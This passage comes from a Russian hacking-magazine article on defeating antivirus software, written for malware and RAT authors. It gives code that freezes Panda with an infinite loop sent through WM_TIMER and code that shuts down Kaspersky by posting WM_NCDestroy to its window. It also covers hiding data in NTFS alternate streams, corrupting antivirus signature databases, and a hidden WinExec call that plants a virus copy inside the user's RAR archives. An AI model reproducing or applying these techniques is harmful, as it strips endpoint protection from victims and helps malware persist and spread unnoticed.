Антиантивирус

Абанов Георгий aka Zero Ice

Спецвыпуск: Хакер, номер #048, стр. 048-044-3

nop

nop

nop

…

stupidfun:

nop

jmp stupidfun

и послал сообщение WM_Timer с указателем на начало кода. Panda впадает в ступор и больше не отвечает ни на что. При более внимательном рассмотрении гостя, я нашел определитель версии пушистого медведя и соответствующий список адресов для атаки.

Схожую пакость можно проделать и с русским народным антивирусом. Продукт лаборатории Касперского падает или отключается:

var h:integer;

begin

H:=FindWindow(nil, 'Антивирус Касперского Personal');

postmessage(h, WM_NCDestroy, 0, 0);

end;

Причем предугадать последствия от WM_NCDESTROY мне так и не удалось. Зависание/отключение авера – 10/90. Довольно забавно смотреть на этот недочет. KAV предотвращает вмешательство в свой процесс (OpenProcess не срабатывает даже с SeDebugPrivilege привилегией), и службу нельзя остановить или приостановить, но одно сообщение может выключить антивирус и оставить компьютер без защиты. Единственный минус этой “атаки” – исчезновение значка в трее.

Outro

Напоследок хочу открыть страшную тайну: защита от вирусов и червей в 90% случаев лежит в первую очередь на плечах создателя RAT. Только он можешь представить и оценить последствия от запуска неизвестной программы или аттача. Ни один современный антивирус не выловит неизвестный ему вирус (существующие эвристические анализы и эмуляторы кода остаются в зачаточном состоянии уже многие годы), хотя и не все известные ловятся и лечатся. Да чего говорить о неизвестных? Существуют аверы, которые до сих пор не сканируют файловые потоки NTFS’a! Вот, например, эта самая функция просмотра файловых потоков:

function BackupSeekA(hFile: THandle; dwLowBytesToSeek, dwHighBytesToSeek: DWORD; lpdwLowByteSeeked, lpdwHighByteSeeked: PDWORD;var lpContext: Pointer): BOOL; stdcall; external kernel32 name 'BackupSeek';

Так что есть у русских тайные погреба, как говорил Мальчиш-Кибальчиш, и вам их не засыпать :). Кстати, не стоит забывать и о возможности порчи вирусами сигнатур базах известных антивирусов. В интернете без проблем можно найти описание форматов практически всех популярных баз и рабочие примеры извлечения и изменения в них инфы. Советую также обратить внимание на свои архивы. Существуют паразиты, прячущие себя в них, иногда замещая собой исполняемые файлы. Найти известный архиватор на компьютере пользователя и добавить себя в архив довольно легко. Например, для формирования параметров к RAR’у обрати внимание на “o+” – перезапись существующих файлов. Вот одна из вариаций ключей:

WinExec(PathToRarExe+ ‘ a -o+ ‘+ArchName+’ ‘+VirusCopyPath,SW_HIDE);

Засим позволь откланяться.

О работе с файловыми потоками мы писали в Спеце «the ХР Files» #03.2004(40), а рубрика «Кодинг» Хакера освещала эту тему в статье «Куда уходят файлы». Если ты не купил этот журнал, то воспользуйся ссылкой www.xakep.ru/magazine/xa/065/114/5.asp.